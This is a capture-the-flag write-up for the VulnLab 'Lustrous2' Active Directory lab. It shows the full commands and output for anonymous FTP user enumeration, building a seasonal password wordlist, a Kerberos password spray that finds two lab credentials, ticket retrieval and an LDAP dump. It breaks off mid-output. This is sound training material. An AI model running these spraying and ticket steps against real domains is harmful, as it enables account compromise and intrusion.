POSTS

VULNLAB: Lustrous2

LustrousTwo is a hard-rated Windows machine that deals with LDAP signing, channel binding, and disabled NTLM authentication. The machine has a web server vulnerable to arbitrary file read, which helps attackers capture a Net-NTLMv2 hash for the service account, using it to request Service Tickets via s4u2self, a stealthier alternative to Silver Ticket, to bypass protective measures like Account is sensitive and cannot be delegated. After reversing and auditing the source code, the attacker achieves Remote Code Execution. For privilege escalation, the attacker exploits a misconfigured, insecure Velociraptor installation.

VULNLAB: Lustrous2
7310 words · 35 min

Overview

  • Type Machines
  • OS Windows
  • Severity Hard
  • Creator xct
  • Release date 2024 Sep 11

Enumeration

Start the instance via Discord, wait around 10 minutes for the machine to start all services and let’s go:

image

10.10.64.29

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.64.29
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-30 10:42 JST
Nmap scan report for lus2dc.lustrous2.vl (10.10.64.29)
Host is up (0.24s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
21/tcp    open  tcpwrapped
53/tcp    open  tcpwrapped
80/tcp    open  tcpwrapped
88/tcp    open  tcpwrapped
135/tcp   open  tcpwrapped
139/tcp   open  tcpwrapped
445/tcp   open  tcpwrapped
3389/tcp  open  tcpwrapped
|_ssl-date: 2025-01-30T01:46:05+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=LUS2DC.Lustrous2.vl
| Not valid before: 2024-09-06T06:56:23
|_Not valid after:  2025-03-08T06:56:23
49664/tcp open  tcpwrapped
49671/tcp open  tcpwrapped
49696/tcp open  tcpwrapped
49708/tcp open  tcpwrapped
62940/tcp open  tcpwrapped
  • Seems a domain controller of the domain lustrous2.vl (88/tcp kerberos is open).
  • Main open ports are for FTP/HTTP server, DNS, LDAP, SMB and RDP.
  • Add lus2dc.lustrous2.vl, lustrous2.vl in in /etc/hosts

FTP (21/tcp) (Thomas.Myers & Emma.Bell)

Anonymous access is allowed:

$ nxc ftp lus2dc.lustrous2.vl -u 'anonymous' -p '' --ls
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [*] Banner: Microsoft FTP Service
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [+] anonymous: - Anonymous Login!
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [*] Directory Listing
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  04:20AM       <DIR>          Development
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Homes
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 08-31-24  12:57AM       <DIR>          HR
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 08-31-24  12:57AM       <DIR>          IT
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-09-24  09:25AM       <DIR>          ITSEC
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 08-31-24  12:58AM       <DIR>          Production
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 08-31-24  12:58AM       <DIR>          SEC
                                                                                                                                                                    
$ nxc ftp lus2dc.lustrous2.vl -u 'anonymous' -p '' --ls Homes
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [*] Banner: Microsoft FTP Service
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [+] anonymous: - Anonymous Login!
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [*] Directory Listing for Homes
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Aaron.Norman
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Adam.Barnes
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Amber.Ward
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Andrea.Smith
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Ann.Lynch
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Callum.Oliver
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Carly.Walker
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Chelsea.Smith
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Chloe.Hammond
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Christopher.Lawson
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Claire.Parry
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Darren.Lewis
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Deborah.Jones
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Dominic.West
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Duncan.Smith
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Elaine.Gallagher
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Eleanor.Gregory
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Emma.Bell
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Francesca.Norman
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Gary.Richards
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Gerard.Ward
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Glenn.Williams
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Graeme.Pritchard
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Harriet.Richardson
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Henry.Connor
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Howard.Robinson
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Jacqueline.Phillips
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Janice.Collier
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Jasmine.Johnson
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Joan.Wall
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Judith.Francis
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Justin.Williams
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Kyle.Hussain
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Kyle.Lloyd
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Lawrence.Bryan
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Leah.Elliott
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Lewis.Khan
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Liam.Wheeler
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Lisa.Begum
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Louis.Phillips
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Lydia.Parker
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Malcolm.Yates
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Marie.Hill
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Martin.Hamilton
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Mathew.Roberts
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Melissa.Thompson
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Nathan.Carter
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Nicola.Clarke
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Nicola.Hall
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Nigel.Lee
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Pamela.Taylor
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Robert.Russell
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Ryan.Davies
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Ryan.Moore
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Ryan.Rowe
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Samantha.Smith
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Sara.Matthews
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          ShareSvc
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Sharon.Birch
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Sharon.Evans
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Stacey.Barber
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Stacey.Griffiths
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Stephanie.Baxter
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Stephanie.Davies
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Steven.Sutton
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Susan.Johnson
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Terence.Jordan
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Thomas.Myers
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Tony.Davies
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Victoria.Williams
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-06-24  11:03PM       <DIR>          Wayne.Taylor
                                                                                                                                                                    
$ nxc ftp lus2dc.lustrous2.vl -u 'anonymous' -p '' --ls ITSEC
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [*] Banner: Microsoft FTP Service
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [+] anonymous: - Anonymous Login!
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [*] Directory Listing for ITSEC
FTP         10.10.64.29     21     lus2dc.lustrous2.vl 09-07-24  02:50AM                  207 audit_draft.txt

Found the users list in Homes and a file audit_draft.txt in ITSEC

Grab the names and collect them in a clean all_users.txt file:

$ nxc ftp lus2dc.lustrous2.vl -u 'anonymous' -p '' --ls Homes | while read x; do if [[ $x == *"<DIR>"* ]]; then echo ${x##* }; fi; done > all_users.txt

Download the audit_draft.txt file and read it:

$ nxc ftp lus2dc.lustrous2.vl -u 'anonymous' -p '' --get ITSEC/audit_draft.txt
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [*] Banner: Microsoft FTP Service
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [+] anonymous: - Anonymous Login!
FTP         10.10.64.29     21     lus2dc.lustrous2.vl [+] Downloaded: ITSEC/audit_draft.txt

$ cat audit_draft.txt      
Audit Report Issue Tracking

[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled

[Open] Weak User Passwords

Security has been improved, included signing and channel binding enabled so maybe that means kerberos/gssapi/channel binding attacks

Create a custom wordlist using ChatGPT 4o mini:

image

The custom_wordlist.txt output:

$ cat custom_wordlist.txt 
Lustrous2!
Lustrous2@
Lustrous2#
Lustrous2$
Lustrous2%
Lustrous2^
Lustrous2&
Lustrous2*
Spring!
Spring@
Spring#
Spring$
Spring%
Spring^
Spring&
Spring*
Summer!
Summer@
Summer#
Summer$
Summer%
Summer^
Summer&
Summer*
Autumn!
Autumn@
Autumn#
Autumn$
Autumn%
Autumn^
Autumn&
Autumn*
Winter!
Winter@
Winter#
Winter$
Winter%
Winter^
Winter&
Winter*
Lustrous2024
Lustrous22024
Lustrous22024!
Lustrous22024@
Lustrous22024#
Lustrous22024$
Lustrous22024%
Lustrous22024^
Lustrous22024&
Lustrous22024*
Lustrous2025
Lustrous22025
Lustrous22025!
Lustrous22025@
Lustrous22025#
Lustrous22025$
Lustrous22025%
Lustrous22025^
Lustrous22025&
Lustrous22025*
Spring2024
Spring2024!
Spring2024@
Spring2024#
Spring2024$
Spring2024%
Spring2024^
Spring2024&
Spring2024*
Spring2025
Spring2025!
Spring2025@
Spring2025#
Spring2025$
Spring2025%
Spring2025^
Spring2025&
Spring2025*
Summer2024
Summer2024!
Summer2024@
Summer2024#
Summer2024$
Summer2024%
Summer2024^
Summer2024&
Summer2024*
Summer2025
Summer2025!
Summer2025@
Summer2025#
Summer2025$
Summer2025%
Summer2025^
Summer2025&
Summer2025*
Autumn2024
Autumn2024!
Autumn2024@
Autumn2024#
Autumn2024$
Autumn2024%
Autumn2024^
Autumn2024&
Autumn2024*
Autumn2025
Autumn2025!
Autumn2025@
Autumn2025#
Autumn2025$
Autumn2025%
Autumn2025^
Autumn2025&
Autumn2025*
Winter2024
Winter2024!
Winter2024@
Winter2024#
Winter2024$
Winter2024%
Winter2024^
Winter2024&
Winter2024*
Winter2025
Winter2025!
Winter2025@
Winter2025#
Winter2025$
Winter2025%
Winter2025^
Winter2025&
Winter2025*

Let’s go for password spray attack:

$ nxc ldap lus2dc.lustrous2.vl -u all_users.txt -p custom_wordlist.txt --continue-on-success
LDAP        10.10.64.29     389    LUS2DC.Lustrous2.vl [*]  x64 (name:LUS2DC.Lustrous2.vl) (domain:Lustrous2.vl) (signing:True) (SMBv1:False)
LDAP        10.10.64.29     389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Aaron.Norman:Lustrous2! STATUS_NOT_SUPPORTED
LDAP        10.10.64.29     389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Adam.Barnes:Lustrous2! STATUS_NOT_SUPPORTED
LDAP        10.10.64.29     389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Amber.Ward:Lustrous2! STATUS_NOT_SUPPORTED
LDAP        10.10.64.29     389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Andrea.Smith:Lustrous2! STATUS_NOT_SUPPORTED
...

I forget that we saw previously [Fixed] NTLM Authentication Allowed so NTLM is disabled and authentication is only possible via kerberos.

We can spray using nxc and kerberos by adding the -k flag as follow:

$ nxc ldap lus2dc.lustrous2.vl -u all_users.txt -p custom_wordlist.txt --continue-on-success -k
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [*]  x64 (name:LUS2DC.Lustrous2.vl) (domain:Lustrous2.vl) (signing:True) (SMBv1:False)
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Aaron.Norman:Lustrous2! KDC_ERR_PREAUTH_FAILED
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Adam.Barnes:Lustrous2! KDC_ERR_PREAUTH_FAILED
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Amber.Ward:Lustrous2! KDC_ERR_PREAUTH_FAILED
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Andrea.Smith:Lustrous2! KDC_ERR_PREAUTH_FAILED
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Ann.Lynch:Lustrous2! KDC_ERR_PREAUTH_FAILED
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Callum.Oliver:Lustrous2! KDC_ERR_PREAUTH_FAILED
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Carly.Walker:Lustrous2! KDC_ERR_PREAUTH_FAILED
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Chelsea.Smith:Lustrous2! KDC_ERR_PREAUTH_FAILED
LDAP        lus2dc.lustrous2.vl 389    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Chloe.Hammond:Lustrous2! KDC_ERR_PREAUTH_FAILED
...
LDAPS       lus2dc.lustrous2.vl 636    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Thomas.Myers:Lustrous2024 
...
LDAPS       lus2dc.lustrous2.vl 636    LUS2DC.Lustrous2.vl [-] Lustrous2.vl\Emma.Bell:Summer2024! 
...

No KDC_ERR_PREAUTH_FAILED error for 2 users: Thomas.Myers and Emma.Bell

Double check:

$ nxc smb lus2dc.lustrous2.vl -u 'Emma.Bell' -p 'Summer2024!' -k   
SMB         lus2dc.lustrous2.vl 445    lus2dc           [*]  x64 (name:lus2dc) (domain:lustrous2.vl) (signing:True) (SMBv1:False)
SMB         lus2dc.lustrous2.vl 445    lus2dc           [+] lustrous2.vl\Emma.Bell:Summer2024! 

$ nxc smb lus2dc.lustrous2.vl -u 'Thomas.Myers' -p 'Lustrous2024' -k
SMB         lus2dc.lustrous2.vl 445    lus2dc           [*]  x64 (name:lus2dc) (domain:lustrous2.vl) (signing:True) (SMBv1:False)
SMB         lus2dc.lustrous2.vl 445    lus2dc           [+] lustrous2.vl\Thomas.Myers:Lustrous2024

Confirmed we got the valid credentials for 2 users

Get a TGT for Thomas.Myers:

$ impacket-getTGT lustrous2.vl/thomas.myers:'Lustrous2024' -dc-ip lus2dc.lustrous2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in thomas.myers.ccache

Inject to our global environement:

$ export KRB5CCNAME=thomas.myers.ccache
$ klist 
Ticket cache: FILE:thomas.myers.ccache
Default principal: thomas.myers@LUSTROUS2.VL

Valid starting       Expires              Service principal
01/30/2025 12:32:55  01/30/2025 22:32:55  krbtgt/LUSTROUS2.VL@LUSTROUS2.VL
	renew until 01/31/2025 12:32:56

LDAPS enumeration (636/tcp)

We install ldeep because netexec (at the moment where this writeup has been written 2005-01) did not work correctly with the bloodhound module and kerberos auth:

$ pipx install ldeep                                    
  installed package ldeep 1.0.81, installed using Python 3.12.8
  These apps are now globally available
    - ldeep
done! ✨ 🌟 ✨

Full LDAPS enumeration (AD dump):

$ mkdir ldeep_lustrous2
$ ldeep ldap -k -s ldaps://lus2dc.lustrous2.vl -d lustrous2.vl all ldeep_lustrous2/ 
[+] Retrieving auth_policies output
[+] Retrieving auth_policies verbose output
[+] Retrieving bitlockerkeys output
[+] Retrieving bitlockerkeys verbose output
[+] Retrieving computers output
[+] Retrieving conf output
[+] Retrieving delegations output
[+] Retrieving delegations verbose output
[+] Retrieving delegations verbose output
[+] Retrieving delegations verbose output
...

Quick check in the enabled users list about Admin accounts:

$ cat _users_enabled.json | jq | grep -I -C10 'Admins' 
    "dn": "CN=Henry Connor,OU=lustrous,DC=Lustrous2,DC=vl",
    "givenName": "Henry",
    "homeDirectory": "\\\\LUS2DC.Lustrous2.vl\\homes$\\Henry.Connor",
    "homeDrive": "F:",
    "instanceType": 4,
    "lastLogoff": "1601-01-01T00:00:00+00:00",
    "lastLogon": "1601-01-01T00:00:00+00:00",
    "logonCount": 0,
    "memberOf": [
      "CN=lustrous,CN=Users,DC=Lustrous2,DC=vl",
      "CN=Domain Admins,CN=Users,DC=Lustrous2,DC=vl"
    ],
    "name": "Henry Connor",
    "objectCategory": "CN=Person,CN=Schema,CN=Configuration,DC=Lustrous2,DC=vl",
    "objectClass": [
      "top",
      "person",
      "organizationalPerson",
      "user"
    ],
    "objectGUID": "{ae124eba-5f48-400f-b695-a4650d3c6fd3}",
--
    "dn": "CN=Howard Robinson,OU=lustrous,DC=Lustrous2,DC=vl",
    "givenName": "Howard",
    "homeDirectory": "\\\\LUS2DC.Lustrous2.vl\\homes$\\Howard.Robinson",
    "homeDrive": "F:",
    "instanceType": 4,
    "lastLogoff": "1601-01-01T00:00:00+00:00",
    "lastLogon": "1601-01-01T00:00:00+00:00",
    "logonCount": 0,
    "memberOf": [
      "CN=lustrous,CN=Users,DC=Lustrous2,DC=vl",
      "CN=Domain Admins,CN=Users,DC=Lustrous2,DC=vl"
    ],
    "name": "Howard Robinson",
    "objectCategory": "CN=Person,CN=Schema,CN=Configuration,DC=Lustrous2,DC=vl",
    "objectClass": [
      "top",
      "person",
      "organizationalPerson",
      "user"
    ],
    "objectGUID": "{7d13b789-1aa8-49b8-9e1d-db188401a0ea}",
--
    "distinguishedName": "CN=Sharon Birch,OU=lustrous,DC=Lustrous2,DC=vl",
    "dn": "CN=Sharon Birch,OU=lustrous,DC=Lustrous2,DC=vl",
    "givenName": "Sharon",
    "homeDirectory": "\\\\LUS2DC.Lustrous2.vl\\homes$\\Sharon.Birch",
    "homeDrive": "F:",
    "instanceType": 4,
    "lastLogoff": "1601-01-01T00:00:00+00:00",
    "lastLogon": "1601-01-01T00:00:00+00:00",
    "logonCount": 0,
    "memberOf": [
      "CN=ShareAdmins,OU=lustrous,DC=Lustrous2,DC=vl",
      "CN=lustrous,CN=Users,DC=Lustrous2,DC=vl"
    ],
    "msDS-SupportedEncryptionTypes": 0,
    "name": "Sharon Birch",
    "objectCategory": "CN=Person,CN=Schema,CN=Configuration,DC=Lustrous2,DC=vl",
    "objectClass": [
      "top",
      "person",
      "organizationalPerson",
      "user"
--
    "dn": "CN=Ryan Davies,OU=lustrous,DC=Lustrous2,DC=vl",
    "givenName": "Ryan",
    "homeDirectory": "\\\\LUS2DC.Lustrous2.vl\\homes$\\Ryan.Davies",
    "homeDrive": "F:",
    "instanceType": 4,
    "lastLogoff": "1601-01-01T00:00:00+00:00",
    "lastLogon": "1601-01-01T00:00:00+00:00",
    "lastLogonTimestamp": "2024-09-07T10:50:05.598505+00:00",
    "logonCount": 0,
    "memberOf": [
      "CN=ShareAdmins,OU=lustrous,DC=Lustrous2,DC=vl",
      "CN=lustrous,CN=Users,DC=Lustrous2,DC=vl"
    ],
    "msDS-SupportedEncryptionTypes": 0,
    "name": "Ryan Davies",
    "objectCategory": "CN=Person,CN=Schema,CN=Configuration,DC=Lustrous2,DC=vl",
    "objectClass": [
      "top",
      "person",
      "organizationalPerson",
      "user"
--
    "distinguishedName": "CN=Administrator,CN=Users,DC=Lustrous2,DC=vl",
    "dn": "CN=Administrator,CN=Users,DC=Lustrous2,DC=vl",
    "instanceType": 4,
    "isCriticalSystemObject": true,
    "lastLogoff": "1601-01-01T00:00:00+00:00",
    "lastLogon": "2024-10-20T15:55:26.336658+00:00",
    "lastLogonTimestamp": "2024-10-20T15:54:35.310734+00:00",
    "logonCount": 20,
    "memberOf": [
      "CN=Group Policy Creator Owners,CN=Users,DC=Lustrous2,DC=vl",
      "CN=Domain Admins,CN=Users,DC=Lustrous2,DC=vl",
      "CN=Enterprise Admins,CN=Users,DC=Lustrous2,DC=vl",
      "CN=Schema Admins,CN=Users,DC=Lustrous2,DC=vl",
      "CN=Administrators,CN=Builtin,DC=Lustrous2,DC=vl"
    ],
    "name": "Administrator",
    "objectCategory": "CN=Person,CN=Schema,CN=Configuration,DC=Lustrous2,DC=vl",
    "objectClass": [
      "top",
      "person",
      "organizationalPerson",
      "user"
    ],
  • Ryan Davies and Sharon Birch are in ShareAdmins group
  • Henry Connor and Howard Robinson are in Domain Admins group

WEB (80/tcp)

We check the access to the website:

$ curl http://lus2dc.lustrous2.vl -I
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
X-Powered-By: ASP.NET
Date: Thu, 30 Jan 2025 04:54:15 GMT

Authentication is required

Note
  • In order to make kerberos authentication work from our non-domain joined linux attacker machine, we need to configure krb5.conf (install with sudo apt install krb5-user if needed).

Our Kerberos real configuration:

$ cat /etc/krb5.conf                                 
[libdefaults]
        default_realm = LUSTROUS2.VL
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        fcc-mit-ticketflags = true
        dns_canonicalize_hostname = false
        dns_lookup_realm = false
        dns_lookup_kdc = true
        k5login_authoritative = false
[realms]        
        LUSTROUS2.VL = {
                kdc = lus2dc.lustrous2.vl
                admin_server = lustrous2.vl
                default_admin = lustrous2.vl
        }
[domain_realm]
        .lustrous2.vl = LUSTROUS2.VL

So try using Kerberos:

$ curl --negotiate -u : http://lus2dc.lustrous2.vl -I
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvDD/O1wosz/68eTYQS5lOLoQFZcNOtf/3AQypGU+GWBfACBWlqWkF8lMAlnDQ4q7uzciJLqwqH8rmy1UqA5PQ35SV8jVkR2YCyKm6c1o1NYl+aN17QnAnlscL2UwQqqtHhzKZ+5mdLZQYcEcJeRpR
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Thu, 30 Jan 2025 07:59:41 GMT

Works

Now we will configure our Firefox browser to be able to use Kerberos authentication, we put about:config in the search bar then add the below settings:

network.negotiate-auth.delegation-uris: lustrous2.vl
network.negotiate-auth.trusted-uris: lustrous2.vl
network.negotiate-auth.using-native-gsslib: true

Change from:

image

to:

image

Then open Firefox from our terminal (where we have injected the TGT):

$ firefox

Then we can access to the website:

image

We can also do the same with cURL:

$ curl --negotiate -u : http://lus2dc.lustrous2.vl -v
* Host lus2dc.lustrous2.vl:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.99.159
*   Trying 10.10.99.159:80...
* Connected to lus2dc.lustrous2.vl (10.10.99.159) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
> GET / HTTP/1.1
> Host: lus2dc.lustrous2.vl
> Authorization: Negotiate YIIGXAYGKwYBBQUCoIIGUDCCBkygDTALBgkqhkiG9xIBAgKiggY5BIIGNWCCBjEGCSqGSIb3EgECAgEAboIGIDCCBhygAwIBBaEDAgEOogcDBQAgAAAAo4IFLGGCBSgwggUkoAMCAQWhDhsMTFVTVFJPVVMyLlZMoiYwJKADAgEDoR0wGxsESFRUUBsTbHVzMmRjLmx1c3Ryb3VzMi52bKOCBOMwggTfoAMCARKhAwIBA6KCBNEEggTN79PBo5S6LBGmN78O6/B622Ti3lK3WDIQMdgn+/c/Gpy+y127yRJEZH0OB8G2WY4qu2g07FhFrYZGFhdmzyIQiVjll/t7qGjNZvtS9nXBVpVdsSXU1p2O0BCkUvmDm0M1OuTATF4x9rIflm6LuM2wNw2ITDmV3WzBiYXwYoeCavOV7Tpvz77OU7cltvDaNCKwco+lIz2dWYX4iMgI1bzl9NcVjiBJrp+mcCiVI0RQgVFW6ZYwpuvIweXpn/0dI+8c9Fwjus/oswfb6XdDoq0mAjxYD4CLEmgzWoc6C+nmvNnEiF7EQ4hmEtIhCmgSN1vuYPCskr6xD+OnX7qaDApCgkgU/PE2X4xvj5KBgNlyLOtA5GLZif0CVSYTGnItW8tmh5zC//RmXsP+8ITQ8R/Qx0iWYoTBiiWlHLz2F8KCcTowDj2xTAOMyHx3dLtQiFRDJeSaJmUS+vx5yklaZ55qqwgU4qjNY/LmsMNPpkoZV+GUmBWbYSs8Q0B7wgy7tbQanKGEVO8omxqw4mxtjQKzj5R/w+4jvleqiLKnTZFMtBd5zITQZBwtA4GgOz2VQ/apedvzMPfui56FUKUQ/KK410uFP+IgS+x6n9DLdVrK3O2HnBVo7jSsKypWjJEoypft4iv/ojyYzWXAPuB7myzyrr7ZkQBIVr7kAE1Mnh+TTzZTvWFk/Kdx6OIMKSHwRjEVQaMYn8XaL42OClf2BiitP772u7RjhKM+DjBw2xqqznZ9DvzjAFtsKgUb6YLIGWrj7VhykxSYvchMOfB4/DYu9I5bEPiT+gJRJxxneDZButqzqjjcVlpEx3zk+Cl3wXQC6F4KJBjeCuj6yD02zxtzBtkr7WSG7HLfZm5HwGDhvkumV5H4YIu1OWrc6drgRDDdUqcVcKp3UrZIYAu8mWNuKz1NPCiNubqT1EMPzXYq4LC2pj8DPzC+efJTqi+FAE1jUF40CWi22mj0waOuwGZOk85nvoc+lNWxtdX1D7g+kxc6bwOYTJfwtJi6LtLUUTNYlx7x97Y5o4aEjac9dXg26qlpV